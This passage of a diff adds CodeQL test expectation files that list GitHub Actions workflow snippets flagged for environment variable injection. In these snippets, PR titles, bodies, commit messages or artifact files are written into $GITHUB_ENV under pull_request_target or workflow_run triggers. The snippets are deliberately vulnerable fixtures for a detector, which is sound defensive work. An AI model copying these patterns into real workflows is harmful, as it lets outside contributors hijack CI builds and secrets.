$GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 000000000000..b3f6c4bf7822 --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-077/EnvVarInjectionCritical.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
new file mode 100644
index 000000000000..94e2af8ecaa7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
@@ -0,0 +1,95 @@ +edges +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| 
.github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses 
Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses 
Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | +nodes +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> 
$GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| 
.github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> 
$GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> 
